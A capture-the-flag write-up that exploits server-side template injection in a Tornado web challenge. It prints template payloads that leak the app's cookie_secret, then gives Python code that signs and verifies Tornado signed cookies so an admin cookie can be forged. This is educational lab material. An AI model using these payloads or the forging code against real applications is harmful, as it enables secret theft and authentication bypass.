Web challenge: http://chall.csivit.com:30279/
We have a Tornado application vulnerable to server-side template injection (SSTI). First we need to leak the cookie_secret through the SSTI, then regenerate a signed cookie with admin: true to get the flag.
- Gather general information
- Exploit the SSTI in the icecream parameter and leak the secret
- Regenerate a Tornado signed cookie
When we visit the website we get a page with a form to submit an ice-cream flavour.
The request looks like http://chall.csivit.com:30279/?icecream={{chocolate}}
which led us to consider the possibility of an SSTI attack in the icecream parameter.
First we tried the basic payload {{7*'7'}}:
This confirmed our suspicion that the website is vulnerable to SSTI. Next we tried to get the config by requesting http://chall.csivit.com:30279/?icecream={{config}}
but the server returned an exception:
From this exception we learned that the server is Tornado, an asynchronous Python web server. Back in the documentation, we
noticed that tornado.web.Application uses a settings
dictionary to make application-specific settings such as cookie_secret
available to handlers without using global variables (Tornado settings).
Visiting http://chall.csivit.com:30279/?icecream={{globals()}}
we got:
From this we know that the tornado.web.Application() instance
is named application,
so the final payload to get the secret was ?icecream={{application.settings["cookie_secret"]}}
and the value MangoDB
was displayed on the website.
Signed cookies in Tornado apps contain the base64-encoded cookie value together with a timestamp and an HMAC signature computed from cookie_secret (see the Tornado source on GitHub). Since the secret is the only thing binding the signature to the value, knowing it lets us produce a cookie the server will accept.
We regenerated the cookie with the required value true
to get the flag csictf{h3r3_i_4m};
check out forge_tornado.py.
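As an added example (not the challenge's forge_tornado.py), here is Tornado's version-2 signed-cookie layout implemented as a signer and a verifier, which makes the point above concrete: with the secret, a minted cookie verifies cleanly, while a changed value, a different secret, a different cookie name or an old timestamp is rejected by the HMAC or expiry check. The cookie name "admin" and value "true" are assumptions.

```python
import base64
import hashlib
import hmac
import time

# Added example, not the challenge's forge_tornado.py: Tornado's version-2
# signed-cookie layout "2|1:0|<len>:<ts>|<len>:<name>|<len>:<b64 value>|<hmac>".
# The cookie name "admin" and value "true" used below are assumptions.

def _field(s: bytes) -> bytes:
    return b"%d:%s" % (len(s), s)          # length-prefixed field, e.g. b"4:true"

def _unfield(f: bytes):
    n, _, s = f.partition(b":")             # inverse of _field, None on bad prefix
    return s if n.isdigit() and int(n) == len(s) else None

def _signature_v2(secret: bytes, to_sign: bytes) -> bytes:
    return hmac.new(secret, to_sign, hashlib.sha256).hexdigest().encode()

def create_signed_value(secret: str, name: str, value: str, timestamp: int) -> bytes:
    """Sign `value` under `name`; the secret is the only thing binding it."""
    to_sign = b"|".join([
        b"2",
        _field(b"0"),                                 # key_version 0: one secret
        _field(str(timestamp).encode()),
        _field(name.encode()),
        _field(base64.b64encode(value.encode())),
        b"",                                          # keeps the trailing "|"
    ])
    return to_sign + _signature_v2(secret.encode(), to_sign)

def decode_signed_value(secret: str, name: str, cookie: bytes,
                        max_age_days: int = 31, now=None):
    """Return the value, or None on bad signature, malformed layout, wrong name or expiry."""
    now = int(time.time()) if now is None else now
    head, bar, signature = cookie.rpartition(b"|")    # everything before the last "|" was signed
    to_sign = head + bar
    if not hmac.compare_digest(_signature_v2(secret.encode(), to_sign), signature):
        return None                                   # tampered, or signed with another secret
    parts = to_sign.split(b"|")
    if len(parts) != 6 or parts[0] != b"2" or parts[5] != b"":
        return None
    fields = [_unfield(p) for p in parts[1:5]]
    if None in fields:
        return None
    _key_version, ts, cname, b64 = fields
    if cname != name.encode() or not ts.isdigit() or int(ts) < now - max_age_days * 86400:
        return None                                   # other cookie name, or too old
    return base64.b64decode(b64)
```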